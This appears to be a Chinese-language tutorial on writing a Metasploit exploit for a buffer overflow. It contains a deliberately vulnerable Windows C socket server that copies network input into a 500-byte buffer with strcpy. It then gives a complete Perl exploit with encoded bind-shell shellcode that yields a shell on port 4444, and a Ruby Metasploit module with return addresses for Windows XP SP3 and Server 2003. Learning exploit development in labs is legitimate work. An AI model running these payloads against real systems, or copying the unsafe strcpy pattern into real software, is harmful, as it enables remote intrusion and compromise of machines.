编写metasploit exploit 远程socket exploir学习

例子是：

#include <iostream.h> 
#include <winsock.h> 
#include <windows.h> 
#include <stdio.h>
//load windows socket 
#pragma comment(lib, "wsoc	k32.lib") 
//Define Return Messages 
#define SS_ERROR 1 
#define SS_OK 0 
void pr( char *str) 
{ 
	char buf[500]=""; 
	strcpy(buf,str); 
} 
void sError(char *str) 
{ 
	MessageBox (NULL, str, "socket Error" ,MB_OK); 
	WSACleanup(); 
} 
int main(int argc, char **argv) 
{ 
	WORD sockVersion; WSADATA wsaData; 
	int rVal; 
	char Message[5000]=""; 
	char buf[2000]=""; 
	u_short LocalPort; 
	LocalPort = 200; 
	//wsock32 initialized for usage 
	sockVersion = MAKEWORD(1,1); 
	WSAStartup(sockVersion, &wsaData); 
	//create server socket 
	SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0); 
	if(serverSocket == INVALID_SOCKET) 
	{ 
		sError("Failed socket()"); 
		return SS_ERROR; 
	} 
	SOCKADDR_IN sin; 
	sin.sin_family = PF_INET; 
	sin.sin_port = htons(LocalPort); 
	sin.sin_addr.s_addr = INADDR_ANY; 
	//bind the socket 
	rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin)); 
	if(rVal == SOCKET_ERROR) 
	{ 
		sError("Failed bind()"); 
		WSACleanup(); 
		return SS_ERROR; 
	} 
	//get socket to listen 
	rVal = listen(serverSocket, 10); 
	if(rVal == SOCKET_ERROR) 
	{ 
		sError("Failed listen()"); 
		WSACleanup(); 
		return SS_ERROR; 
	} 
	//wait for a client to connect 
	SOCKET clientSocket; 
	clientSocket = accept(serverSocket, NULL, NULL); 
	if(clientSocket == INVALID_SOCKET) 
	{ 
		sError("Failed accept()"); 
		WSACleanup(); 
		return SS_ERROR; 
	} 
	int bytesRecv = SOCKET_ERROR; 
	while( bytesRecv == SOCKET_ERROR ) 
	{ 
		//receive the data that is being sent by the client max limit to 5000 bytes. 
		bytesRecv = recv( clientSocket, Message, 5000, 0 ); 
		if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET ) 
		{ 
			printf( "
Connection Closed.
"); 
			break; 
		} 
	} 
	//Pass the data received to the function pr 
	pr(Message); 
	//close client socket 
	closesocket(clientSocket); 
	//close server socket 
	closesocket(serverSocket); 
	WSACleanup(); 
	return SS_OK; 
} 

典型的EIP 覆盖问题················

perl   SOCKET 代码：  

在CMD 中   perl 1.pl   服务器IP  服务器端口

use strict;
use Socket;
my $junk = "x41"x504;
my $eip = pack('V',0x769A1594);#0x769A1594      push esp - ret
my $prejumk = "x90"x46;
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh, 
my $shellcode = 
"x31xc9xdbxc3xd9x74x24xf4xb8xf3x9axbcx81x5b" .
"xb1x56x31x43x16x03x43x16x83xc3xf7x78x49x7d" .
"x1fxf5xb2x7exdfx66x3ax9bxeexb4x58xefx42x09" .
"x2axbdx6exe2x7ex56xe5x86x56x59x4ex2cx81x54" .
"x4fx80x0dx3ax93x82xf1x41xc7x64xcbx89x1ax64" .
"x0cxf7xd4x34xc5x73x46xa9x62xc1x5axc8xa4x4d" .
"xe2xb2xc1x92x96x08xcbxc2x06x06x83xfax2dx40" .
"x34xfaxe2x92x08xb5x8fx61xfax44x59xb8x03x77" .
"xa5x17x3axb7x28x69x7ax70xd2x1cx70x82x6fx27" .
"x43xf8xabxa2x56x5ax38x14xb3x5axedxc3x30x50" .
"x5ax87x1fx75x5dx44x14x81xd6x6bxfbx03xacx4f" .
"xdfx48x77xf1x46x35xd6x0ex98x91x87xaaxd2x30" .
"xdcxcdxb8x5cx11xe0x42x9dx3dx73x30xafxe2x2f" .
"xdex83x6bxf6x19xe3x46x4exb5x1ax68xafx9fxd8" .
"x3cxffxb7xc9x3cx94x47xf5xe9x3bx18x59x41xfc" .
"xc8x19x31x94x02x96x6ex84x2cx7cx19x82xe2xa4" .
"x4ax65x07x5bx7dx29x8exbdx17xc1xc6x16x8fx23" .
"x3dxafx28x5bx17x83xe1xcbx2fxcdx35xf3xafxdb" .
"x16x58x07x8cxecxb2x9cxadxf3x9exb4xa4xccx49" .
"x4exd9x9fxe8x4fxf0x77x88xc2x9fx87xc7xfex37" .
"xd0x80x31x4exb4x3cx6bxf8xaaxbcxedxc3x6ex1b" .
"xcexcax6fxeex6axe9x7fx36x72xb5x2bxe6x25x63" .
"x85x40x9cxc5x7fx1bx73x8cx17xdaxbfx0fx61xe3" .
"x95xf9x8dx52x40xbcxb2x5bx04x48xcbx81xb4xb7" .
"x06x02xcax46x9ax9fx5bxf1x4fxe2x01x02xbax21" .
"x3cx81x4exdaxbbx99x3bxdfx80x1dxd0xadx99xcb" .
"xd6x02x99xd9";

my $host = shift || 'localhost';
my $port = shift || 200;
my $proto = getprotobyname('tcp');

my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port,$iaddr);

socket(SOCKET,AF_INET,SOCK_STREAM,$proto) or die "socket: $!";
print "[+] Connecting to $host on port $port
";
connect(SOCKET,$paddr) or die "connect: $!";

print "[+] Sending payload";
print SOCKET $junk.$eip.$prejumk.$shellcode."
";

print "[+] Payload sent
";
close SOCKET or die "cose: $!";

执行完后   

telnet    服务器IP  4444   即可得到shell

主要能看懂metasploit 就好了·········

C:Program FilesMetasploitFramework3msf3modulesexploitswindowsmisc 创建文件  xxx.rb

require 'msf/core' class Metasploit3 < Msf::Exploit::Remote 

	include Msf::Exploit::Remote::Tcp 
	def initialize(info = {}) 
		super(update_info(info, 
			'Name' => 'Custom vulnerable server stack overflow', 
			'Description' => %q{ 
				This module exploits a stack overflow in a 
				custom vulnerable server. 
				}, 
			'Author' => [ 'Peter Van Eeckhoutte' ], 
			'Version' => '$Revision: 9999 $', 
			'DefaultOptions' => 
				{ 
				'EXITFUNC' => 'process', 
				}, 
			'Payload' => 
				{ 
				'Space' => 1400, 
				'BadChars' => "x00xff", 
				}, 
			'Platform' => 'win', 
			'Targets' => 
				[ 
					['Windows XP SP3 En', { 'Ret' => 0x7c874413, 'Offset' => 504 } ], 
					['Windows 2003 Server R2 SP2', { 'Ret' => 0x71c02b67, 'Offset' => 504 } ], 
				], 
			'DefaultTarget' => 0, 
			'Privileged' => false )) 
			
		register_options( [ Opt::RPORT(200) ], self.class) 
	end 

	def exploit 
		connect 

		junk = make_nops(target['Offset']) 
		sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded 
		sock.put(sploit) 
		handler 
		disconnect 
	end 
end